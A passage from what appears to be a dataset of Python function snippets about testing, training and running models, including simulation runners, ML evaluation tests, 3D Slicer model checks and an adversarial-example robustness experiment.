Model('test_model', elements, conduits)\n settings = Settings(OrderedDict([\n ('test1', 13),\n ('test2', 13.3),\n ('test3', 'testing'),\n ('test4', True),\n ('test5', [2.3, 5.6]),\n ('test6', [[1.0, 2.0], [3.0, 1.0]])]))\n\n configuration = Configuration(model, settings)\n\n implementations = {'macro_impl': macro, 'micro_impl': micro}\n run_simulation(configuration, implementations)\n\n check_profile_output(tmp_path)", "def test_svd_smoothing_with_model(self):\n\n\t\t\n\t\t# 819 =~ 4096*0.2\n\t\tself.watcher.SVDSmoothing(model=self.model, layers=[self.fc2_layer])\n\t\tesd = self.watcher.get_ESD(layer=self.fc2_layer) \n\t\tnum_comps = len(esd[esd>10**-10])\n\t\tself.assertEqual(num_comps, 819)", "def run_tests():\n source1 = TextModel('prep')\n source1.add_file('source_model_1.txt')\n \n source2 = TextModel('athletes')\n source2.add_file('source_model_2.txt')\n\n new1 = TextModel('my_writing')\n new1.add_file('my_writing.txt')\n new1.classify(source1, source2)\n\n # Add code for three other new models below.", "def run_model(project=None, model=None, raw=None, dyr=None, xls=None, path=None, server='tcp://127.0.0.1:5678'):\n ret = 0\n if (not project) or (not model):\n logging.error('RT-LAB project or model undefined.')\n sys.exit(-1)\n if (not raw) and (not xls):\n logging.error('PSS/E raw file or ePHASORsim Excel file undefined.')\n sys.exit(-1)\n if not dyr:\n logging.debug('PSS/E dyr file not specified')\n\n sim = SimControl(project, model, path)\n\n simulink = os.path.join(path,project, 'simulink')\n models = os.path.join(path,project, 'models')\n if not os.path.isdir(simulink):\n logging.error('No <{}> directory found.'.format(simulink))\n if not os.path.isdir(models):\n logging.error('No <{}> directory found.'.format(models))\n sys.exit(1)\n else:\n logging.info('Using <{}> directory'.format(models))\n modelPath = models\n else:\n logging.info('Using <{}> directory'.format(simulink))\n modelPath = simulink\n\n\n sim_data = LTBSetup(raw=raw, dyr=dyr, xls=xls, path=modelPath, model=model, simObject=sim)\n\n streaming = Streaming(name='sim', server=server, ltb_data=sim_data)\n\n sim.open()\n sim.load()\n\n sim_data.get_sysparam()\n sim_data.get_varheader_idxvgs()\n sim.set_settings(sim_data.Settings)\n # sim_data.Idxvgs['Line'].update(sim.add_branch_power_to_idxvgs())\n # sim_data.Varheader.extend(sim.add_vars_varheader(sim_data.Idxvgs['Line']))\n # sim_data.Idxvgs['Bus'].update(sim.add_bus_power_to_idxvgs())\n # sim_data.Varheader.extend(sim.add_vars_varheader(sim_data.Idxvgs['Bus']))\n streaming.send_init()\n logging.debug('Varheader, SysParam and Idxvgs sent.')\n sleep(0.5)\n\n sim.start()\n\n streaming.run()", "def analysis():\n global prediction\n\n json_path = os.path.join(basedir, 'static', 'data', 'tmp_json')\n # csv_path = os.path.join(basedir, 'static', 'data', 'csv')\n # if not os.path.exists(csv_path):\n # os.mkdir(csv_path)\n\n if os.name == 'nt':\n audio_file = Path(os.path.join(json_path, 'audio_data.shlf.dir'))\n video_file = Path(os.path.join(json_path, 'facial_data.shlf.dir'))\n else:\n audio_file = Path(os.path.join(json_path, 'audio_data.shlf'))\n video_file = Path(os.path.join(json_path, 'facial_data.shlf'))\n\n # Files exists\n if audio_file.is_file() and video_file.is_file():\n with shelve.open(os.path.join(json_path, 'facial_data.shlf')) as shelf:\n emotion_data = shelf['emotion_data']\n microexpression_data = shelf['micro_expression_data']\n blink_data = shelf['blink_data']\n\n with shelve.open(os.path.join(json_path, 'audio_data.shlf')) as shelf:\n mean_energy = shelf['mean_energy']\n max_pitch_amp = shelf['max_pitch_amp']\n vowel_duration = shelf['vowel_duration']\n pitch_contour = shelf['pitch_contour']\n\n else:\n emotion_data = None\n microexpression_data = None\n blink_data = None\n mean_energy = None\n max_pitch_amp = None\n vowel_duration = None\n pitch_contour = None\n\n # Training Files (choose one)\n # soc_file = os.path.join(basedir, 'static', 'data', 'train_files', 'first_soc.txt')\n # niko_file = os.path.join(basedir, 'static', 'data', 'train_files', 'first_niko.txt')\n # vero_file = os.path.join(basedir, 'static', 'data', 'train_files', 'first_vero.txt')\n\n # txt_file = soc_file\n\n # train_data = []\n\n # for cases where one parameter has more elements\n # for i in range(min(len(blink_data), len(microexpression_data), len(mean_energy))):\n # train_data.append(0)\n\n # train_file = open(txt_file)\n\n # for line in train_file:\n # index1 = int((int(line[4]) * 600) + ((int(line[5]) * 60) + (int(line[7]) * 10) + int(line[8])) / 2)\n # index2 = int((int(line[10]) * 600) + ((int(line[11]) * 60) + (int(line[13]) * 10) + int(line[14])) / 2)\n # if line[0] == 'F':\n # train_data[index1] = 1\n # train_data[index2] = 1\n\n # with open(os.path.join(csv_path, 'train.csv'), 'w', newline='') as csv_file:\n # writer = csv.writer(csv_file)\n # writer.writerow(['Time Interval', 'Micro-expressions', 'Blinks',\n # 'Mean Energy', 'Max Pitch Amplitude', 'Vowel Duration', 'Fundamental Frequency',\n # 'False/True'])\n\n # # for cases where one parameter has more elements than another\n # for index in range(min(len(mean_energy), len(blink_data), len(microexpression_data))):\n # writer.writerow([index, microexpression_data[index], blink_data[index],\n # mean_energy[index], max_pitch_amp[index], vowel_duration[index], pitch_contour[index],\n # train_data[index]])\n\n # finalresults = [['Time Interval', 'Micro-expressions', 'Blinks',\n # 'Mean Energy', 'Max Pitch Amplitude', 'Vowel Duration', 'Fundamental Frequency' ]]\n final_results = []\n\n for index in range((min(len(mean_energy), len(blink_data), len(microexpression_data)))):\n final_results.append([microexpression_data[index], blink_data[index],\n mean_energy[index], max_pitch_amp[index], vowel_duration[index],\n pitch_contour[index]])\n\n prediction[0] = predict(final_results)\n\n return render_template('analysis.html', mean_energy=mean_energy, max_pitch_amp=max_pitch_amp,\n vowel_duration=vowel_duration, pitch_contour=pitch_contour, blink_data=blink_data,\n microexpression_data=microexpression_data, emotion_data=emotion_data)", "def define_model(model):\n global log_data_likelihood, log_priors, num_params, file_labels, labels, prior_xs, prior_pdfs\n num_prior_pts = 1001\n pic50_lower = -4.\n pic50_upper = 14.\n hill_lower = 0.\n hill_upper = 6.\n if model == 1:\n num_params = 2\n log_data_likelihood = log_data_likelihood_model_1_capped\n log_priors = log_priors_model_1\n labels = [r\"$pIC50$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0], loc=mu, scale=s),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower),[0,0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n st.gamma.pdf(prior_xs[1], sigma_shape, loc=sigma_loc, scale=sigma_scale)]\n elif model == 2:\n num_params = 3\n log_data_likelihood = log_data_likelihood_model_2_capped\n log_priors = log_priors_model_2\n labels = [r\"$pIC50$\", r\"$Hill$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','Hill','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(hill_lower, hill_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.concatenate(([hill_uniform_lower-2,hill_uniform_lower],\n np.linspace(hill_uniform_lower, hill_uniform_upper, num_prior_pts),\n [hill_uniform_upper,hill_uniform_upper+2])),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0],loc=mu,scale=s),\n # st.fisk.pdf(prior_xs[1],c=beta,scale=alpha),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n # np.concatenate(([0, 0], np.ones(num_prior_pts) / (1. * sigma_uniform_upper - sigma_uniform_lower), [0, 0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n st.gamma.pdf(prior_xs[2], sigma_shape, loc=sigma_loc, scale=sigma_scale)]", "def test_linear_ranking_model_save(self):\n feature_config_path = os.path.join(self.root_data_dir, \"configs/linear_model\", self.feature_config_fname)\n self.load_model_config(os.path.join(self.root_data_dir, \"configs/linear_model\", \"model_config.yaml\"))\n feature_config: FeatureConfig = FeatureConfig.get_instance(\n tfrecord_type=self.args.tfrecord_type,\n feature_config_dict=self.file_io.read_yaml(feature_config_path),\n logger=self.logger,\n )\n\n ranking_model: RankingModel = self.get_ranking_model(\n loss_key=self.args.loss_key,\n feature_config=feature_config,\n metrics_keys=[\"MRR\"]\n )\n ranking_dataset = RelevanceDataset(\n data_dir=os.path.join(self.root_data_dir, \"tfrecord\"),\n data_format=\"tfrecord\",\n feature_config=feature_config,\n tfrecord_type=self.args.tfrecord_type,\n max_sequence_size=self.args.max_sequence_size,\n batch_size=self.args.batch_size,\n preprocessing_keys_to_fns={},\n train_pcent_split=self.args.train_pcent_split,\n val_pcent_split=self.args.val_pcent_split,\n test_pcent_split=self.args.test_pcent_split,\n use_part_files=self.args.use_part_files,\n parse_tfrecord=True,\n file_io=self.file_io,\n logger=self.logger,\n )\n ranking_model.build(ranking_dataset)\n\n # Save the model and check if coefficients file was saved\n ranking_model.save(models_dir=self.args.models_dir)\n assert os.path.exists(os.path.join(self.args.models_dir, \"coefficients.csv\"))\n\n # Check coefficients for all features were saved\n coefficients_df = pd.read_csv(\n os.path.join(self.args.models_dir, \"coefficients.csv\"))\n train_features = set(feature_config.get_train_features(\"node_name\"))\n\n # Adding +1 to account for bias term\n assert len(train_features) + 1 == coefficients_df.shape[0]\n for train_feature in train_features:\n assert train_feature in coefficients_df.feature.values", "def test_readers_remeber_spawned_spectra(self):\n pass", "def verifyModels(self):\r\n\r\n #\r\n # now check that all models have the same poly data in the\r\n # model node as in the display node\r\n #\r\n polyDataInScene = []\r\n fileNamesInScene = []\r\n success = True\r\n numModels = slicer.mrmlScene.GetNumberOfNodesByClass( \"vtkMRMLModelNode\" )\r\n for n in range(numModels):\r\n modelNode = slicer.mrmlScene.GetNthNodeByClass( n, \"vtkMRMLModelNode\" )\r\n polyDataInScene.append(modelNode.GetPolyData())\r\n for dn in range(modelNode.GetNumberOfDisplayNodes()):\r\n displayNode = modelNode.GetNthDisplayNode(dn)\r\n if modelNode.GetPolyData() != displayNode.GetInputPolyData():\r\n self.delayDisplay(\"Model %d does not match its display node %d! (name: %s, ids: %s and %s)\" % (n,dn,modelNode.GetName(), modelNode.GetID(),displayNode.GetID()))\r\n success = False\r\n for sn in range(modelNode.GetNumberOfStorageNodes()):\r\n storageNode = modelNode.GetNthStorageNode(sn)\r\n fileName = storageNode.GetFileName()\r\n fileNamesInScene.append(fileName)\r\n if fileName in fileNamesInScene:\r\n self.delayDisplay(\"Model %d has duplicate file name %s! (ids: %s and %s)\" % (n,fileName,modelNode.GetID(),storageNode.GetID()))\r\n success = False\r\n\r\n\r\n #\r\n # now check that each model has a unique polydata\r\n #\r\n for n in range(numModels):\r\n modelNode = slicer.mrmlScene.GetNthNodeByClass( n, \"vtkMRMLModelNode\" )\r\n if polyDataInScene.count(modelNode.GetPolyData()) > 1:\r\n self.delayDisplay(\"Polydata for Model is duplicated! (id: %s and %s)\" % (n,modelNode.GetID()))\r\n success = False\r\n\r\n return success", "def test_02_train(self):\n today = date.today()\n log_file = os.path.join(LOG_DIR, \"{}-train-{}-{}.log\".format(LOG_PREFIX, today.year, today.month))\n \n ## update the log\n country = 'india'\n date_range = ('2017-11-29', '2019-05-24')\n metric = {'rmse':0.5}\n runtime = \"00:00:01\"\n model_version = 0.1\n model_version_note = \"test model\"\n \n update_train_log(country, date_range, metric, runtime,\n model_version, model_version_note ,test=True, prefix=LOG_PREFIX)\n\n df = pd.read_csv(log_file)\n logged_metric = [literal_eval(i) for i in df['metric'].copy()][-1]\n self.assertEqual(metric,logged_metric)", "def test_one_epoch_model(self, model: nn.Module) -> Tuple[float, Dict[str, float]]:\n losses = []\n l1_criterion = nn.L1Loss()\n model.eval()\n\n # testloaders contain same length(iteration) of batch dataset\n for sample_batched in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n image = torch.autograd.Variable(sample_batched['image'].cuda())\n depth = torch.autograd.Variable(sample_batched['depth'].cuda(non_blocking=True))\n maxDepth = 1000.0\n depth_n = maxDepth/depth\n #No use self.criterion \n\n output = self.model(image)\n # Compute the loss\n\n l_depth = l1_criterion(output, depth_n)\n\n l_ssim = torch.clamp((1 - ssim(output, depth_n, val_range = 1000.0 / 10.0)) * 0.5, 0, 1)\n\n loss = (1.0 * l_ssim) + (0.1 * l_depth)\n\n \n\n if self.half:\n images = images.half()\n\n # forward + backward + optimize\n \n self._count_correct_prediction(output, depth_n)\n losses.append(loss.item())\n\n avg_loss = sum(losses) / len(losses)\n acc = self._get_epoch_acc(is_test=True)\n return avg_loss, acc\n\n # # testloaders contain same length(iteration) of batch dataset\n # for data in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n # images, labels = data[0].to(self.device), data[1].to(self.device)\n\n # if self.half:\n # images = images.half()\n\n # # forward + backward + optimize\n # loss, outputs = self.criterion(model, images=images, labels=labels)\n # self._count_correct_prediction(outputs, labels)\n # losses.append(loss.item())\n\n # avg_loss = sum(losses) / len(losses)\n # acc = self._get_epoch_acc(is_test=True)\n # return avg_loss, acc", "def test_STLModelBuilder1(self):\n\n self.delayDisplay(\"Starting the test\")\n #\n # first, get some data\n #\n import SampleData\n SampleData.downloadFromURL(\n nodeNames='FA',\n fileNames='FA.nrrd',\n uris='http://slicer.kitware.com/midas3/download?items=5767')\n self.delayDisplay('Finished with download and loading')\n\n volumeNode = slicer.util.getNode(pattern=\"FA\")\n logic = STLModelBuilderLogic()\n # self.assertIsNotNone(logic.hasImageData(volumeNode))\n self.delayDisplay('Test passed!')", "def test_patches(args, model, device): \n if args.val_patches:\n test_path = config.data_path + '/val/original/'\n elif args.test_patches:\n test_path = config.data_path + '/test/original/'\n test_image_num = len([name for name in os.listdir(test_path)\n if os.path.isfile(os.path.join(test_path, name))]) // config.batch_size * config.batch_size\n\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar = 0.0, 0.0, 0.0, 0.0\n for start in range(0, test_image_num, config.batch_size):\n end = min(start + config.batch_size, test_image_num)\n if args.val_patches:\n test_original, test_style = load_test_dataset_patches('val', config.data_path, start, end,\n config.height * config.width * config.channels) \n elif args.test_patches:\n test_original, test_style = load_test_dataset_patches('test', config.data_path, start, end,\n config.height * config.width * config.channels)\n x = torch.from_numpy(test_original).float()\n y_real = torch.from_numpy(test_style).float()\n x = x.view(-1, config.height, config.width, config.channels).permute(0, 3, 1, 2).to(device)\n y_real = y_real.view(-1, config.height, config.width, config.channels).permute(0, 3, 1, 2).to(device)\n\n y_fake = model.gen_g(x)\n\n # Calculate PSNR & SSIM scores\n score_psnr += psnr(y_fake, y_real) * config.batch_size\n\n y_fake_np = y_fake.detach().cpu().numpy().transpose(0, 2, 3, 1)\n y_real_np = y_real.cpu().numpy().transpose(0, 2, 3, 1)\n temp_ssim, _ = compare_ssim(y_fake_np, y_real_np, multichannel=True, gaussian_weights=True, full=True)\n score_ssim_skimage += (temp_ssim * config.batch_size)\n\n temp_ssim, _ = ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5)\n score_ssim_minstar += temp_ssim * config.batch_size\n\n score_msssim_minstar += multi_scale_ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5) * config.batch_size\n print('PSNR & SSIM scores of {} images are calculated.'.format(end))\n\n score_psnr /= test_image_num\n score_ssim_skimage /= test_image_num\n score_ssim_minstar /= test_image_num\n score_msssim_minstar /= test_image_num\n print('PSNR : {:.4f}, SSIM_skimage : {:.4f}, SSIM_minstar : {:.4f}, SSIM_msssim: {:.4f}'.format(\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar))", "def test_active_inference_SPM_1b(self):", "def main():\n\n # Create model_dict from arguments\n model_dict = model_dict_create()\n\n # No. of deviations to consider\n no_of_mags = 50\n dev_list = np.linspace(0.1, 5.0, no_of_mags)\n\n # Load dataset specified in model_dict\n print('Loading data...')\n dataset = model_dict['dataset']\n if (dataset == 'MNIST'):\n X_train, y_train, X_val, y_val, X_test, y_test = load_dataset(model_dict)\n # rd_list = [None, 784, 331, 200, 100, 90, 80, 70, 60, 50, 40, 30, 20, 10]\n rd_list = [None, 331, 100, 80, 60, 40, 20]\n # rd_list = [None,784,100]\n elif dataset == 'GTSRB':\n X_train, y_train, X_val, y_val, X_test, y_test = load_dataset(model_dict)\n rd_list = [1024, 338, 200, 100, 90, 80, 70, 60, 50, 40, 33, 30, 20, 10]\n elif dataset == 'HAR':\n X_train, y_train, X_test, y_test = load_dataset(model_dict)\n # rd_list = [561, 200, 100, 90, 80, 70, 60, 50, 40, 30, 20, 10]\n rd_list = [561]\n X_val = None\n y_val = None\n\n mean = np.mean(X_train, axis=0)\n X_train -= mean\n X_test -= mean\n if (dataset == 'MNIST') or (dataset == 'GTSRB'): X_val -= mean\n\n # fig, ax = plt.subplots(nrows=1, ncols=1)\n\n # for rd in rd_list:\n # model_setup_carlini(model_dict, X_train, y_train, X_test, y_test, X_val, y_val, mean, rd, ax)\n\n partial_carlini = partial(model_setup_carlini, model_dict=model_dict, X_train=X_train, y_train=y_train, X_test=X_test, y_test=y_test, X_val=X_val, y_val=y_val,\n mean=mean)\n pool=multiprocessing.Pool(processes=8)\n pool.map(partial_carlini,rd_list,1)\n pool.close()\n pool.join()\n\n # dim_red = model_dict['dim_red']\n # plt.legend()\n # plt.savefig('carlini_l2_hist_'+dim_red+'.png')", "def test_svd_smoothing_alt(self):\n \t\t\n\t\tprint(\"----test_svd_smoothing_alt-----\")\n\n\t\t# need model here; somehow self.model it gets corrupted by SVD smoothing\n\t\t#model = models.vgg11(pretrained=True)\n\t\t\n\t\tself.watcher.SVDSmoothing(layers=[self.fc2_layer], percent=-0.2)\n\t\tesd = self.watcher.get_ESD(layer=self.fc2_layer) \n\t\tnum_comps = len(esd[esd>10**-10])\n\t\t# 3277 = 4096 - 819\n\t\tprint(\"num comps = {}\".format(num_comps))\n\t\tself.assertEqual(num_comps, 3277)", "def test_rm500(self):\n\t\tmy_test_file = \"/\".join([os.path.dirname(sys.modules[\"cancerscope\"].__file__), \"../tests/data/test_tcga.txt\"])\n\t\tscope_ensemble_obj = cancerscope.scope()\n\t\ttest_X = scope_ensemble_obj.load_data(my_test_file) # X, samples, features_test, in_genecode\n\t\t## Get the model of interest\n\t\tmodel_name = \"v1_rm500\"\n\t\tmodel_in = \"\"\n\t\tquery_localdirs = cancerscope.get_models.findmodel(os.path.dirname(cancerscope.__file__), model_name)\n\t\tif query_localdirs is not None:\n\t\t\tmodel_in = query_localdirs[model_name]\n\t\telse:\n\t\t\tmodel_in = cancerscope.get_models.downloadmodel(model_label=model_name)\n\t\tself.assertTrue(os.path.isdir(model_in))\n\t\tself.assertTrue(os.path.exists(\"\".join([model_in, \"/lasagne_bestparams.npz\"])))\n\t\t\"\"\"Test if model can be setup correctly\"\"\"\n\t\tlmodel = cancerscope.scopemodel(model_in)\n\t\tlmodel.fit()\n\t\tself.assertEqual(len(lmodel.features), 17688)\n\t\tx_input = lmodel.prepare_input_featorders(X=test_X[0], x_features_genecode = test_X[3], x_features=test_X[2])\n\t\t\"\"\"Test if it predicts properly\"\"\"\n\t\tallpreds_names = lmodel.predict(x_input, get_all_predictions=True,get_numeric=False, get_predictions_dict=False)\n\t\tallpreds_values = lmodel.predict(x_input, get_all_predictions=True,get_numeric=True, get_predictions_dict=False)\n\t\ttoppreds_names = lmodel.predict(x_input, get_all_predictions=False,get_numeric=False, get_predictions_dict=False)\n\t\ttoppreds_values = lmodel.predict(x_input, get_all_predictions=False,get_numeric=True, get_predictions_dict=False)\n\t\ttoppreds_df = lmodel.predict(x_input, get_all_predictions=True,get_numeric=False, get_predictions_dict=True)\n\t\tself.assertEqual(len(allpreds_names[0]), 66); self.assertEqual(len(allpreds_names[1]), 66); \n\t\tself.assertEqual(allpreds_values.shape[1],66); \n\t\tself.assertAlmostEqual(allpreds_values[0][1], 0.003065253372039)\n\t\tself.assertEqual(toppreds_names[0], \"PAAD_TS\"); self.assertEqual(toppreds_names[1], \"HNSC_TS\")\n\t\tself.assertAlmostEqual(toppreds_values[0],0.20889836023919614, 6, 0.000001); self.assertAlmostEqual(toppreds_values[1], 0.44416348623870444, 6, 0.000001)\n\t\t#self.assertEqual(round(toppreds_values[0],12), round(0.208874390780809,12)); self.assertEqual(round(toppreds_values[1],12), round(0.444162763077693,12))\n\t\tself.assertEqual(toppreds_df[0][0][0], toppreds_names[0]); self.assertAlmostEqual(float(toppreds_df[0][0][1]), toppreds_values[0]); \n\t\tself.assertEqual(toppreds_df[1][0][0], toppreds_names[1]); self.assertAlmostEqual(float(toppreds_df[1][0][1]), toppreds_values[1])", "def test(model, dataloader):\n model.eval()\n device = model.device\n time_start = time.time()\n batch_time = 0.0\n accuracy = 0.0\n all_prob, all_labels = [], []\n \n with torch.no_grad():\n for (batch_seqs, batch_seq_masks, batch_seq_segments, batch_labels) in dataloader:\n batch_start = time.time()\n seqs = batch_seqs.to(device) \n masks = batch_seq_masks.to(device)\n segments = batch_seq_segments.to(device)\n labels = batch_labels.to(device)\n\n _, _, probabilities = model(seqs, masks, segments, labels)\n accuracy += correct_predictions(probabilities, labels)\n batch_time += time.time() - batch_start\n all_prob.extend(probabilities[:, 1].cpu().numpy())\n all_labels.extend(batch_labels)\n batch_time /= len(dataloader)\n total_time = time.time() - time_start\n accuracy /= (len(dataloader.dataset))\n return batch_time, total_time, accuracy, roc_auc_score(all_labels, all_prob)", "def actual_showcase(natural, isTest):\n\tmax_cells = 31\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tif isTest:\n\t\t\tmidfix = \"test\"\n\t\telse:\n\t\t\tmidfix = \"train\"\n\n\t\tif natural:\n\t\t\tif isTest:\n\t\t\t\tloader = nat_test_loader\n\t\t\t\tglobal len_test_nat\n\t\t\t\tlen_test_nat = len(nat_test_loader)\n\t\t\telse:\n\t\t\t\tloader = nat_train_loader\n\t\t\tprefix = \"nat\"\n\t\telse:\n\t\t\tif isTest:\n\t\t\t\tloader = syn_test_loader\n\t\t\t\tglobal len_test_syn\n\t\t\t\tlen_test_syn = len(syn_train_loader)\n\t\t\telse:\n\t\t\t\tloader = syn_train_loader\n\t\t\tprefix = \"syn\"\n\n\t\tlog_sam_train_file = open(directory + \"/showcase/sam_train_log.txt\", \"a\")\n\t\tlog_sam_test_file = open(directory + \"/showcase/sam_test_log.txt\", \"a\")\n\t\tlog_file = open(directory + \"/showcase/values.txt\", \"a\")\n\n\t\tccs = []\n\t\tlabls = []\n\t\t#file_names = []\n\t\tnum_unlabeled = 0\n\t\toccurrences = np.zeros(max_cells)\n\t\tbar_corrects = np.zeros(max_cells)\n\t\tbar_maes = np.zeros(max_cells)\n\t\tbar_devs = np.zeros(max_cells)\n\t\tfor batch_idx, (data, labels) in enumerate(loader): # , file_batch)\n\t\t\tfor l in labels:\n\t\t\t\toccurrences[l] += 1\n\t\t\t\tif prefix == \"nat\" and l == 0:\n\t\t\t\t\toccurrences[l] -= 1\n\n\t\t\tdata = data.cuda()\n\t\t\tlabels = labels.float().cuda()\n\n\t\t\tmodel.mode = 'natural' if natural else 'synth'\n\t\t\trecon_batch, mu, logvar, cc = model(data)\n\n\t\t\tcc[labels == 0] = 0 # Sets the counted cells to 0 for unlabeled data, so that regressor_loss=0\n\t\t\tnum_unlabeled += (labels == 0).sum()\n\t\t\t_, _, _ = loss_function(recon_batch, data, mu, logvar, cc, labels, natural)\n\n\t\t\tccs.append(cc.cpu().detach().numpy())\n\t\t\tlabls.append(labels.cpu().detach().numpy())\n\t\t\t#for file in file_batch:\n\t\t\t\t#file_names.append(file)\n\n\t\tpreds = np.concatenate(ccs, axis=None) # elementwise round of cc\n\t\tlbls = np.concatenate(labls, axis=None) # elementswise round of labels\n\n\t\t# Optional: Draw label and prediction onto result images\n\t\t\"\"\"for i in range(len(lbls)):\n\t\t\tif lbls[i] != 0:\n\t\t\t\timg = Image.open(file_names[i]).convert('RGB')\n\t\t\t\timg = img.resize((img.width * 4, img.width * 4), Image.NEAREST)\n\t\t\t\tmode = img.mode\n\t\t\t\tnew_img = Image.new(mode, (256, 292))\n\t\t\t\tnew_img.paste(img, (0, 36, 256, 292))\n\t\t\t\tdraw = ImageDraw.Draw(new_img)\n\t\t\t\tfont = ImageFont.truetype(\"arial.ttf\", 32)\n\t\t\t\tdraw.text((4, 0), \"P: \" + str(np.round(preds[i],2)), (255, 255, 255), font=font)\n\t\t\t\tdraw.text((128, 0), \"L: \" + str(lbls[i]), (255, 255, 255), font=font)\n\t\t\t\tnew_img.save(directory + \"/showcase/\" + prefix + \"_sample\" + str(i) + \".jpg\")\"\"\"\n\n\t\tpred_log = []\n\t\tlbl_log = []\n\t\t# filename_log = []\n\t\tfor x in range(len(lbls)):\n\t\t\tif lbls[x] != 0:\n\t\t\t\t# filename_log.append(str(file_names[x]))\n\t\t\t\tpred_log.append(str(np.round(preds[x], 2)))\n\t\t\t\tlbl_log.append(str(lbls[x]))\n\t\t# log_data_file.write(str(filename_log))\n\t\tif midfix == \"train\":\n\t\t\tlog_sam_train_file.write(str(pred_log) + \"\\n\" + str(lbl_log) + \"\\n\")\n\t\telse:\n\t\t\tlog_sam_test_file.write(str(pred_log) + \"\\n\" + str(lbl_log) + \"\\n\")\n\t\t# log_data_file.write(str(file_names))\n\t\t# log_sam_file.write(str(np.round(preds[preds != 0], 2)) + \"\\n\" + str(lbls[lbls != 0]) + \"\\n\")\n\t\tpreds = np.around(preds)\n\n\t\tcorrect = np.sum(preds == lbls) # Count elementwise equality of preds and lbls\n\t\tlen_set = len(loader.dataset)\n\t\tcorrect -= num_unlabeled # Remove zero_indices from numerator\n\t\tcorrect = float(correct) / float(len_set - num_unlabeled) # Remove zero_indices from denominator\n\n\t\tdist_sum = np.sum(np.abs(np.subtract(preds, lbls))) # Elementwise addition of dist between predictions and labels\n\t\tMAE = dist_sum / float(len_set - num_unlabeled)\n\n\t\tlen_labeled = float(len_set - num_unlabeled)\n\t\tdev = np.ones(len_set) - np.divide(preds, lbls) # Deviation contains NaNs because syn data has lbl=0\n\t\tavg_dev = np.sum(np.abs(np.where(np.isnan(dev), 0, dev))) / len_labeled # Rake the avg only of those deviations that weren't NaN\n\n\t\tlog_file.write(prefix + \" \" + midfix + \" correct is: \" + str(correct) + \"\\n\")\n\t\tlog_file.write(prefix + \" \" + midfix + \" MAE is: \" + str(MAE) + \"\\n\")\n\t\tlog_file.write(prefix + \" \" + midfix + \" DEV is: \" + str(avg_dev) + \"\\n\")\n\n\t\tlog_file.close()\n\n\t\tfor i in range(0,len(preds)):\n\t\t\tif lbls[i] == 0:\n\t\t\t\tcontinue\n\t\t\tif preds[i] == lbls[i]:\n\t\t\t\tbar_corrects[int(lbls[i])] += 1\n\t\t\tbar_maes[int(lbls[i])] += np.abs(preds[i]-lbls[i])\n\t\t\tbar_devs[int(lbls[i])] += np.abs(1-(preds[i]/lbls[i]))\n\n\t\tbar_corrects = np.multiply(np.divide(bar_corrects,occurrences), 100)\n\t\tbar_maes = np.divide(bar_maes, occurrences)\n\t\tbar_devs = np.divide(bar_devs, occurrences)\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0,max_cells)), y=bar_corrects)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" % correct\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"% correct\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_correct.html\", auto_open=False) # Includes fig.show()\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0, max_cells)), y=bar_maes)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" MAE\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"MAE\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_MAE.html\", auto_open=False) # Includes fig.show()\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0, max_cells)), y=bar_devs)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" DEV\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"DEV\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + 